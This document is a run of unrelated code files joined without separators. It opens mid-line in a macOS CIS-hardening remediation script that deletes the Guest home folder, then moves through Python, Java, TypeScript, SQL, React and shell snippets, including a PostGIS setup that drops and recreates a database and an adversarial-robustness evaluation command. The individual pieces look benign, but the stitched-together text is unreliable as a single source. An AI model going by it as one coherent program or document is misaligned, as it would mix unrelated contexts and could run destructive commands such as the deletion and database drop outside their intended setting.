https://support.apple.com/en-us/HT202277 # Verify organizational score Audit5_14="$(defaults read "$plistlocation" OrgScore5_14)" # If organizational score is 1 or true, check status of client if [ "$Audit5_14" = "1" ]; then PolicyBannerText="CIS mandated Login Window banner" /bin/echo "$PolicyBannerText" > "/Library/Security/PolicyBanner.txt" /bin/chmod 755 
"/Library/Security/PolicyBanner."* echo "$(date -u)" "5.14 remediated" | tee -a "$logFile" fi # 5.15 Do not enter a password-related hint (Not Scored) # 5.16 Disable Fast User Switching (Not Scored) # Verify organizational score Audit5_16="$(defaults read "$plistlocation" OrgScore5_16)" # If organizational score is 1 or true, check status of client if [ "$Audit5_16" = "1" ]; then defaults write /Library/Preferences/.GlobalPreferences MultipleSessionEnabled -bool false echo "$(date -u)" "5.16 remediated" | tee -a "$logFile" fi # 5.19 System Integrity Protection status # Verify organizational score Audit5_19="$(defaults read "$plistlocation" OrgScore5_19)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_19" = "1" ]; then echo "This tool needs to be executed from the Recovery OS." #/usr/bin/csrutil enable #echo "$(date -u)" "5.19 remediated" | tee -a "$logFile" fi # 6.1.1 Display login window as name and password # Verify organizational score Audit6_1_1="$(defaults read "$plistlocation" OrgScore6_1_1)" # If organizational score is 1 or true, check status of client if [ "$Audit6_1_1" = "1" ]; then defaults write /Library/Preferences/com.apple.loginwindow SHOWFULLNAME -bool true echo "$(date -u)" "6.1.1 remediated" | tee -a "$logFile" fi # 6.1.2 Disable "Show password hints" # Verify organizational score Audit6_1_2="$(defaults read "$plistlocation" OrgScore6_1_2)" # If organizational score is 1 or true, check status of client if [ "$Audit6_1_2" = "1" ]; then defaults write /Library/Preferences/com.apple.loginwindow RetriesUntilHint -int 0 echo "$(date -u)" "6.1.2 remediated" | tee -a "$logFile" fi # 6.1.3 Disable guest account # Verify organizational score Audit6_1_3="$(defaults read "$plistlocation" OrgScore6_1_3)" # If organizational score is 1 or true, check status of client if [ "$Audit6_1_3" = "1" ]; then defaults write /Library/Preferences/com.apple.loginwindow.plist GuestEnabled -bool false echo 
"$(date -u)" "6.1.3 remediated" | tee -a "$logFile" fi # 6.1.4 Disable "Allow guests to connect to shared folders" # Verify organizational score Audit6_1_4="$(defaults read "$plistlocation" OrgScore6_1_4)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit6_1_4" = "1" ]; then echo "$(date -u)" "Checking 6.1.4" | tee -a "$logFile" afpGuestEnabled="$(defaults read /Library/Preferences/com.apple.AppleFileServer guestAccess)" smbGuestEnabled="$(defaults read /Library/Preferences/SystemConfiguration/com.apple.smb.server AllowGuestAccess)" if [ "$afpGuestEnabled" = "1" ]; then defaults write /Library/Preferences/com.apple.AppleFileServer guestAccess -bool no echo "$(date -u)" "6.1.4 remediated" | tee -a "$logFile"; fi if [ "$smbGuestEnabled" = "1" ]; then defaults write /Library/Preferences/SystemConfiguration/com.apple.smb.server AllowGuestAccess -bool no echo "$(date -u)" "6.1.4 remediated" | tee -a "$logFile"; fi fi # 6.1.5 Remove Guest home folder # Verify organizational score Audit6_1_5="$(defaults read "$plistlocation" OrgScore6_1_5)" # If organizational score is 1 or true, check status of client if [ "$Audit6_1_5" = "1" ]; then rm -rf /Users/Guest echo "$(date -u)" "6.1.5 remediated" | tee -a "$logFile" fi # 6.2 Turn on filename extensions # Verify organizational score Audit6_2="$(defaults read "$plistlocation" OrgScore6_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit6_2" = "1" ]; then sudo -u "$currentUser" defaults write NSGlobalDomain AppleShowAllExtensions -bool true pkill -u "$currentUser" Finder echo "$(date -u)" "6.2 remediated" | tee -a "$logFile" # defaults write /Users/"$currentUser"/Library/Preferences/.GlobalPreferences.plist AppleShowAllExtensions -bool true fi # 6.3 Disable the automatic run of safe files in Safari # Verify organizational score Audit6_3="$(defaults read "$plistlocation" OrgScore6_3)" # If organizational score 
is 1 or true, check status of client # If client fails, then remediate if [ "$Audit6_3" = "1" ]; then /usr/libexec/PlistBuddy -c "Set :AutoOpenSafeDownloads bool false" /Users/"$currentUser"/Library/Containers/com.apple.Safari/Data/Library/Preferences/com.apple.Safari.plist echo "$(date -u)" "6.3 remediated" | tee -a "$logFile" fi echo "$(date -u)" "Remediation complete" | tee -a "$logFile" echo "continue" exit 0
def find_fibonacci(N):
    """Return the N-th Fibonacci number (F(0) = 0, F(1) = 1).

    Args:
        N: Non-negative index into the Fibonacci sequence.

    Returns:
        int: The N-th Fibonacci number.

    Raises:
        ValueError: If N is negative (the original code crashed with an
            UnboundLocalError in that case because the loop never ran).
    """
    if N < 0:
        raise ValueError("N must be a non-negative integer")
    # Iterative pairwise update: a holds F(i), b holds F(i + 1).
    a, b = 0, 1
    for _ in range(N):
        a, b = b, a + b
    return a


# Example Usage
N = 8
print(find_fibonacci(N))  # 21
package cn.icepear.dandelion.upm.api.domain.dto;

import lombok.Data;
import lombok.EqualsAndHashCode;
import lombok.NoArgsConstructor;

/**
 * Department tree node DTO.
 *
 * <p>Extends {@code TreeNode<DeptTree>} so instances can be assembled into a
 * parent/child department hierarchy; tree bookkeeping lives in the base class.</p>
 *
 * @author rim-wood
 * @description Department tree
 * @date Created on 2019-04-18.
 */
@Data
@EqualsAndHashCode(callSuper = true)
@NoArgsConstructor
public class DeptTree extends TreeNode<DeptTree> {

	// Department display name.
	private String deptName;

	/**
	 * Department type.
	 */
	private String deptType;

	/**
	 * Sort order within the parent node.
	 */
	private Integer sortOrder;

	/**
	 * Deletion flag. 1: deleted, 0: active.
	 */
	private int delFlag;

	// Convenience constructor for the department-specific fields; tree
	// structure fields are populated separately via the TreeNode base.
	public DeptTree(String deptName, String deptType, Integer sortOrder, int delFlag) {
		super();
		this.deptName = deptName;
		this.deptType = deptType;
		this.sortOrder = sortOrder;
		this.delFlag = delFlag;
	}
}
# Evaluate a trained CD-VAE defense (robust classifier + VAE checkpoints from
# epoch 82) on CIFAR-10 against a suite of attacks. Each quoted trailing
# argument is one attack specification, evaluated in turn:
#   - NoAttack: clean-accuracy baseline.
#   - AutoLinfAttack / AutoL2Attack: AutoAttack under L-inf (8/255) and L2 (1.0) bounds.
#   - JPEGLinfAttack, StAdvAttack, ReColorAdvAttack: non-Lp threat models, 100 iterations each.
# NOTE(review): checkpoint paths assume the default ./results layout — confirm before running.
python tools/adv_test_cifar.py --model_path ./results/defense_0.1_0.1/robust_model_g_epoch82.pth --vae_path ./results/defense_0.1_0.1/robust_vae_epoch82.pth --batch_size 256 \
"NoAttack()" \
"AutoLinfAttack(cd_vae, 'cifar', bound=8/255)" \
"AutoL2Attack(cd_vae, 'cifar', bound=1.0)" \
"JPEGLinfAttack(cd_vae, 'cifar', bound=0.125, num_iterations=100)" \
"StAdvAttack(cd_vae, num_iterations=100)" \
"ReColorAdvAttack(cd_vae, num_iterations=100)"
package edu.mtu.cabals.model.marketplace;

import java.awt.Point;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

import org.javatuples.Pair;

import ec.util.MersenneTwisterFast;
import edu.mtu.cabals.model.Parameters;
import edu.mtu.cabals.model.TimberMarketplace;
import edu.mtu.cabals.model.WupModel;
import edu.mtu.environment.Forest;
import edu.mtu.environment.NlcdClassification;
import edu.mtu.environment.Stand;
import edu.mtu.steppables.LandUseGeomWrapper;
import edu.mtu.utilities.Constants;
import edu.mtu.utilities.Precision;
import sim.field.geo.GeomGridField;
import sim.field.grid.IntGrid2D;

/**
 * Harvesters (e.g., CF and NIPF) both share the same way of harvesting.
 *
 * FIX: removed a stray "&lt;gh_stars&gt;1-10" scrape artifact that preceded the
 * package declaration and made the file invalid Java.
 */
public abstract class Harvester {

	// TODO Update the range for the variable mark-up to be set via the INI file

	// Multiplier to go from dry to green ton, based on Dulys-Nusbaum et al., 2019
	public final static double DryToGreen = 2;

	private double annualLimit;
	private double markup;
	private double woodyBiomassRetention;

	private MersenneTwisterFast random;

	private HarvestReport annualReport = new HarvestReport();

	// Bucket of forest-grid points that fall in one patch-grid square.
	private class Cell {
		public ArrayList<Point> points = new ArrayList<Point>();
	}

	/**
	 * Find the most mature patch in the given parcel that matches the size.
	 *
	 * @param lu The geometry used to map the bounds.
	 * @param parcel The parcel to examine.
	 * @param patch The size (ha) of the patch to be harvested.
	 * @param dbh The minimum DBH (cm) of the trees.
	 * @return The points in the patch, or null if a match cannot be found.
	 */
	protected List<Point> findPatch(final LandUseGeomWrapper lu, Point[] parcel, double patch, double dbh) {
		// If the patch is greater than or equal to the size of the parcel, just return it
		Forest forest = Forest.getInstance();
		double pixel = forest.getPixelArea();		// sq.m
		double area = (parcel.length * pixel) / Constants.SquareMetersToHectares;
		if (area <= patch) {
			return Arrays.asList(parcel);
		}

		// The bounding rectangle of the agent's parcel converted to an IntGrid2D index (min and max)
		GeomGridField cover = Forest.getInstance().getLandCover();
		int xMin = cover.toXCoord(lu.geometry.getEnvelopeInternal().getMinX());
		int yMin = cover.toYCoord(lu.geometry.getEnvelopeInternal().getMinY());
		int xMax = cover.toXCoord(lu.geometry.getEnvelopeInternal().getMaxX());
		int yMax = cover.toYCoord(lu.geometry.getEnvelopeInternal().getMaxY());

		// Use the bounds to setup our grids
		double divisor = (int)Math.ceil(Constants.SquareMetersToHectares / pixel);	// ha / sq.m
		int xBound = (int)Math.ceil(Math.abs(xMin - xMax) / divisor) + 1;
		int yBound = (int)Math.ceil(Math.abs(yMin - yMax) / divisor) + 1;
		Cell[][] patches = new Cell[xBound][yBound];
		for (int ndx = 0; ndx < xBound; ndx++) {
			for (int ndy = 0; ndy < yBound; ndy++) {
				patches[ndx][ndy] = new Harvester.Cell();
			}
		}
		double[][] meanDbh = new double[xBound][yBound];

		// Since we don't really care about the orientation of the map, make sure we are
		// using the actual minimum values
		xMin = Math.min(xMin, xMax);
		yMin = Math.min(yMin, yMax);

		// Iterate through the points, sum the DBH and assign points to patches
		for (Point point : parcel) {
			int x = (int)Math.floor(Math.abs(point.x - xMin) / divisor);
			int y = (int)Math.floor(Math.abs(point.y - yMin) / divisor);
			patches[x][y].points.add(point);
			Stand stand = forest.getStand(point);

			// If this point is woody wetlands then don't assign any value
			if (stand.nlcd == NlcdClassification.WoodyWetlands.getValue()) {
				continue;
			}

			// Only add the DBH if it is greater than or equal to our target
			// minimum. This also introduces a penalty for the square when
			// it contains a significant number of lower value stands
			if (stand.arithmeticMeanDiameter >= dbh) {
				meanDbh[x][y] += stand.arithmeticMeanDiameter;
			}
		}

		// Find the mean DBH and note the max
		int x = 0, y = 0;
		double max = Double.MIN_VALUE;
		for (int ndx = 0; ndx < meanDbh.length; ndx++) {
			for (int ndy = 0; ndy < meanDbh[ndx].length; ndy++) {
				// Find the average for the square, if it is less than our target
				// then set the square to zero to reserve it for another year
				meanDbh[ndx][ndy] /= patches[ndx][ndy].points.size();
				if (meanDbh[ndx][ndy] < dbh) {
					meanDbh[ndx][ndy] = 0;
					continue;
				}

				// Check to see if this is a good starting point
				if (meanDbh[ndx][ndy] > max) {
					max = meanDbh[ndx][ndy];
					x = ndx;
					y = ndy;
				}
			}
		}

		return findBest(patches, meanDbh, x, y, patch);
	}

	/**
	 * Use a basic greedy algorithm to find the highest value patch from the current location.
	 */
	private List<Point> findBest(Cell[][] patches, double[][] meanDbh, int ndx, int ndy, double target) {
		// Note the pixel area and prepare
		double area = Forest.getInstance().getPixelArea();
		List<Point> points = new ArrayList<Point>();
		double harvest = 0;

		while (harvest < target) {
			// Copy the points over and update the harvest
			harvest += (patches[ndx][ndy].points.size() * area) / Constants.SquareMetersToHectares;
			points.addAll(patches[ndx][ndy].points);
			meanDbh[ndx][ndy] = 0;

			// Find the next harvest patch among the four direct neighbors
			int x = 0, y = 0;
			double max = Double.MIN_VALUE;
			if (ndy != 0 && meanDbh[ndx][ndy - 1] > max) {
				max = meanDbh[ndx][ndy - 1];
				x = ndx;
				y = ndy - 1;
			}
			if (ndx != 0 && meanDbh[ndx - 1][ndy] > max) {
				max = meanDbh[ndx - 1][ndy];
				x = ndx - 1;
				y = ndy;
			}
			if ((ndx + 1) != meanDbh.length && meanDbh[ndx + 1][ndy] > max) {
				max = meanDbh[ndx + 1][ndy];
				x = ndx + 1;
				y = ndy;
			}
			if ((ndy + 1) != meanDbh[ndx].length && meanDbh[ndx][ndy + 1] > max) {
				max = meanDbh[ndx][ndy + 1];
				x = ndx;
				y = ndy + 1;
			}

			// Move
			ndx = x;
			ndy = y;

			// Exit if we didn't move
			if (max == Double.MIN_VALUE) {
				break;
			}
		}

		return points;
	}

	/**
	 * Harvest the given patch.
	 *
	 * @param lu The parcel that the patch is in.
	 * @param patch The points that make up the patch.
	 * @return The report on the harvest.
	 */
	protected HarvestReport harvest(LandUseGeomWrapper lu, List<Point> patch) {
		// Get the reference GIS files
		IntGrid2D visualBuffer = WupModel.getVisualBuffer();
		IntGrid2D wetlands = (IntGrid2D)Forest.getInstance().getLandCover().getGrid();

		// Perform the initial harvest of the patch
		Forest forest = Forest.getInstance();
		Pair<Double, Double> results = forest.harvest(patch.toArray(new Point[0]));

		// Update the report with the results of the harvest
		HarvestReport report = new HarvestReport();
		double area = forest.getPixelArea();
		report.biomass = (results.getValue1() / Constants.KilogramToMetricTon) * DryToGreen;		// Above Ground dry kg to green tons
		report.merchantable = (results.getValue0() / Constants.KilogramToMetricTon) * DryToGreen;	// Stem dry kg converted to green tons
		report.cwd = report.biomass - report.merchantable;											// Above ground woody biomass green tons
		report.harvestedArea = (patch.size() * area) / Constants.SquareMetersToHectares;			// sq.m to ha

		// Check to see what the impacts are via GIS
		final int wetlandsCode = NlcdClassification.WoodyWetlands.getValue();
		for (Point point : patch) {
			if (visualBuffer.get(point.x, point.y) == 0) {
				report.visualImpact += area;
			}
			if (wetlands.get(point.x, point.y) == wetlandsCode) {
				report.wetlandImpact += area;
			}
		}
		report.visualImpact /= Constants.SquareMetersToHectares;	// sq.m to ha
		report.wetlandImpact /= Constants.SquareMetersToHectares;	// sq.m to ha

		// Apply the economic calculations
		report.labor = harvestDuration(report.merchantable);
		report.biomassRecoverable = report.cwd * (1 - woodyBiomassRetention);

		// Apply the biomass costs and return
		biomassCosts(report, lu.getDoubleAttribute("NEAR_KM"));
		return report;
	}

	// Calculate how long we expect the harvest to take, rounded to the nearest hundreds place
	private double harvestDuration(double merchantable) {
		Parameters parameters = WupModel.getParameters();
		double hours = merchantable / parameters.getMerchantableProductivity();
		return Precision.round(hours, 2);
	}

	// Calculate the costs associated with harvesting the biomass
	private void biomassCosts(HarvestReport report, double distance) {
		Parameters parameters = WupModel.getParameters();

		// Chipping labor
		report.loggerHours = Precision.round(report.biomassRecoverable / parameters.getBiomassChipping(), 2);
		double loggerPay = report.loggerHours * parameters.getLoggerPerHour();

		// Transport labor
		double totalDistance = Transporter.getTotalDistance(distance, report.biomassRecoverable);
		report.driverHours = Precision.round(totalDistance / parameters.getKmPerHour(), 2);
		double driverPay = report.driverHours * parameters.getDriverPerHour();

		// Fuel for chipping plus transport
		double fuelCost = report.loggerHours * parameters.getChipperFuel() * parameters.getDieselPerLiter();
		fuelCost += (totalDistance / parameters.getKmPerLiter()) * parameters.getDieselPerLiter();

		report.biomassCost = Precision.round(loggerPay + driverPay + fuelCost, 2);
	}

	/**
	 * Get the report of harvesting.
	 */
	public HarvestReport report() {
		return annualReport;
	}

	/**
	 * Request a bid from the harvester for the given parcel and patch size.
	 *
	 * @param lu The geometry used to map the bounds.
	 * @param parcel The parcel to request the bid on.
	 * @param patch The size (ha) of the patch to be harvested.
	 * @param dbh The minimum DBH of the harvest.
	 * @return The bid and the patch being bid on.
	 */
	public HarvestBid requestBid(LandUseGeomWrapper lu, Point[] parcel, double patch, double dbh) {
		// Find a patch with the given size
		HarvestBid bid = new HarvestBid();
		List<Point> points = findPatch(lu, parcel, patch, dbh);
		if (points == null || points.size() == 0) {
			return bid;
		}

		// Prepare the bid
		bid.patch = points;

		// Calculate the stumpage
		Forest forest = Forest.getInstance();
		TimberMarketplace marketplace = TimberMarketplace.getInstance();
		for (Point point : points) {
			Stand stand = forest.getStand(point);
			double marketPrice = marketplace.calculateBid(stand);
			bid.bid += marketPrice;
		}

		// Return the bid
		return bid;
	}

	/**
	 * Reset the harvest report.
	 */
	public void reset() {
		annualReport = new HarvestReport();
	}

	/**
	 * Update the annual harvest report with the harvest.
	 */
	protected void update(HarvestReport harvest, boolean biomassCollected) {
		annualReport.biomass += harvest.biomass;
		annualReport.merchantable += harvest.merchantable;
		annualReport.cwd += harvest.cwd;
		annualReport.harvestedArea += harvest.harvestedArea;
		annualReport.visualImpact += harvest.visualImpact;
		annualReport.wetlandImpact += harvest.wetlandImpact;
		annualReport.labor += harvest.labor;
		if (biomassCollected) {
			annualReport.biomassRecoverable += harvest.biomassRecoverable;
			annualReport.loggerHours += harvest.loggerHours;
			annualReport.driverHours += harvest.driverHours;
		}
	}

	protected double getAnnualHarvestLimit() {
		return annualLimit;
	}

	protected double getMarkup() {
		// If the mark-up was set, return it
		if (markup != 0) {
			return markup;
		}

		// Calculate a random value (1.05 to 1.19) and return it
		int value = 5 + random.nextInt(15);
		return 1 + (double)value / 100.0;
	}

	protected double getWoodyBiomassRetention() {
		return woodyBiomassRetention;
	}

	/**
	 * Set the annual limit to the number of hours NIPFs can harvest.
	 */
	public void setAnnualHarvestLimit(double value) {
		annualLimit = value;
	}

	/**
	 * Set the margin for woody biomass profits.
	 */
	public void setMarkup(double value) {
		markup = value;
	}

	/**
	 * Set the random number generator.
	 */
	public void setRandom(MersenneTwisterFast value) {
		random = value;
	}

	/**
	 * Set the quantity of woody biomass that must be retained on site.
	 */
	public void setWoodyBiomassRetention(double value) {
		woodyBiomassRetention = value;
	}
}
import re


def parse_field_descriptors(code_snippet):
    """Parse generated descriptor source text into a list of field dicts.

    Scans ``code_snippet`` for ``key=value`` pairs and coerces each value to
    a Python type. Every time a ``file`` key is encountered, the pairs
    collected so far are emitted as one field-descriptor dict.
    """
    descriptors = []
    current = {}
    # The lazy value group ends just before the next "key=" or a ")".
    for match in re.finditer(r"(\w+)=(.*?)(?=(\w+=)|\))", code_snippet):
        name = match.group(1).strip()
        raw = match.group(2).strip().strip(",")
        current[name] = _coerce_value(raw)
        if name == "file":
            # A "file" entry terminates one field descriptor.
            descriptors.append(current)
            current = {}
    return descriptors


def _coerce_value(raw):
    """Convert one raw textual value to its Python equivalent."""
    if raw.startswith("_b"):
        # Strips the _b('...') wrapper. NOTE(review): the regex lookahead has
        # already dropped the trailing ")", so [4:-2] also removes the last
        # two payload characters -- preserved exactly as the original did it.
        return raw[4:-2]
    if raw.startswith("DESCRIPTOR"):
        return raw.strip(")")
    lowered = raw.lower()
    if lowered == "none":
        return None
    if lowered == "false":
        return False
    if lowered == "true":
        return True
    try:
        return int(raw)
    except ValueError:
        return raw
#!/bin/bash

# defines
NC='\033[0m'
RED='\033[0;31m'
GREEN='\033[0;32m'

### Setup database
# Recreate the target database from scratch. Output is fully suppressed:
# note the redirection order must be ">/dev/null 2>&1" -- the original
# "2>&1 >/dev/null" duplicated stderr onto the terminal before stdout was
# redirected, so errors still leaked through.
psql -h "${POSTGIS_HOSTNAME}" -U "${POSTGIS_USER}" \
    -c "DROP DATABASE IF EXISTS ${DATABASE_NAME};" \
    -c "COMMIT;" \
    -c "CREATE DATABASE ${DATABASE_NAME} WITH ENCODING='UTF8' CONNECTION LIMIT=-1;" \
    >/dev/null 2>&1

# Install the PostGIS extensions into the new database.
psql -h "${POSTGIS_HOSTNAME}" -U "${POSTGIS_USER}" -d "${DATABASE_NAME}" \
    -c "CREATE EXTENSION IF NOT EXISTS postgis;" \
    -c "CREATE EXTENSION IF NOT EXISTS postgis_topology;" \
    -c "CREATE EXTENSION IF NOT EXISTS postgis_sfcgal;" \
    -c "CREATE EXTENSION IF NOT EXISTS hstore;" \
    -c "ALTER DATABASE ${DATABASE_NAME} SET postgis.backend = geos;" \
    >/dev/null 2>&1

printf "${GREEN}All done${NC}\n"
import React from 'react' export default function StarRating(props) { const stars = [0, 0, 0, 0, 0] let key = 0 stars.fill(1, 0, props.rating) if (!props.rating) { return <p>No reviews yet</p> } else if (props.showReviewNumber) { return ( <p> Rating:{' '} {stars.map(star => { if (star === 1) { return <span key={key++} className="fas fa-star" /> } else { return <span key={key++} className="far fa-star" /> } })}{' '} {props.reviews.length} {' reviews'} </p> ) } else { return ( <p> Rating:{' '} {stars.map(star => { if (star === 1) { return <span key={key++} className="fas fa-star" /> } else { return <span key={key++} className="far fa-star" /> } })} </p> ) } }
import type {MojoApp, MojoContext} from '../../../../../lib/types.js';

/**
 * Application plugin that registers the "testHelper" helper.
 */
export default function helpersPlugin(app: MojoApp): void {
  app.addHelper('testHelper', testHelper);
}

/**
 * Prefix `partial` with the language reported by the "bar" model.
 */
async function testHelper(ctx: MojoContext, partial: string): Promise<string> {
  const lang: string = ctx.models.bar.language();
  return [lang, partial].join(' ');
}
//
// Created by johnathan on 07/07/18.
//

#ifndef VSS_SIMULATOR_ICONTROLRECEIVERADAPTER_H
#define VSS_SIMULATOR_ICONTROLRECEIVERADAPTER_H

// Abstract interface for a control receiver.
class IControlReceiverAdapter {
public:
    // Virtual destructor so that deleting an implementation through an
    // IControlReceiverAdapter* is well-defined (the original interface had
    // no virtual destructor, which is undefined behavior in that case).
    virtual ~IControlReceiverAdapter() = default;

    // Run one iteration of the receiver; implemented by concrete adapters.
    virtual void loop() = 0;
};

#endif //VSS_SIMULATOR_ICONTROLRECEIVERADAPTER_H
<filename>trunk/src/main/java/org/osgeo/proj4j/UnknownAuthorityCodeException.java package org.osgeo.proj4j; /** * Signals that an authority code is unknown * and cannot be mapped to a CRS definition. * * @author mbdavis * */ public class UnknownAuthorityCodeException extends Proj4jException { public UnknownAuthorityCodeException() { super(); } public UnknownAuthorityCodeException(String message) { super(message); } }
#!/bin/bash

# Resolve the directory containing this script so the relative path to
# bashdb.sh works regardless of the caller's working directory.
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
source "$DIR/../bashdb.sh"

# Store a value, then verify bashdb_contains reports it as present.
bashdb_set testdb a 1

value=$(bashdb_contains testdb a)
if [ "$value" != "1" ]; then
    # Use a valid exit status: "exit -1" is out of the 0-255 range and is
    # rejected outright by POSIX sh.
    exit 1
fi
// State slice for risk queries.
export interface RiskState {
  // Rows returned by the most recent risk query.
  riskQueryResult: any[];
  // True while a query is in flight.
  isLoading: boolean;
  // Last error encountered, or null when none has occurred. The original
  // `error: Error` contradicted the null initial value below and fails to
  // type-check under strictNullChecks; widening to a union is
  // backward-compatible for all readers.
  error: Error | null;
}

// Initial state: no results, not loading, no error.
export const initialState: RiskState = {
  riskQueryResult: [],
  isLoading: false,
  error: null
};
#!/bin/sh -e

printf "Running test_matlab_devices... "

# Unique socket path for this run.
DIME_SOCKET="`mktemp -u`"

# Start the dime server in the background on a unix socket.
../server/dime -l "unix:$DIME_SOCKET" &
DIME_PID=$!

# With `sh -e`, a failing MATLAB run would previously exit before the kill,
# leaking the background server. An EXIT trap guarantees cleanup on both
# success and failure.
trap 'kill $DIME_PID 2>/dev/null' EXIT

env MATLABPATH="../client/matlab" matlab -batch "test_matlab_devices('$DIME_SOCKET')"

printf "Done!\n"
-- Names of users who logged in within the last 7 days.
SELECT u.name
FROM users AS u
WHERE u.last_login_date >= DATE_SUB(CURDATE(), INTERVAL 7 DAY);
#!/usr/bin/env bash

# Required parameters:
# @raycast.schemaVersion 1
# @raycast.title World Time
# @raycast.mode inline
# @raycast.refreshTime 5s
# @raycast.packageName Dashboard

# Optional parameters:
# @raycast.icon 🗺
#
# Documentation:
# @raycast.description Show the time from elsewhere in the world
# @raycast.author Jesse Claven
# @raycast.authorURL https://github.com/jesse-c

# Timezones can be found in /usr/share/zoneinfo

# Capture the current wall-clock time in each city of interest.
cotonou_time=$(TZ=Africa/Porto-Novo date +"%H:%M")
taipei_time=$(TZ=Asia/Taipei date +"%H:%M")

printf 'Cotonou: %s | Taipei: %s\n' "$cotonou_time" "$taipei_time"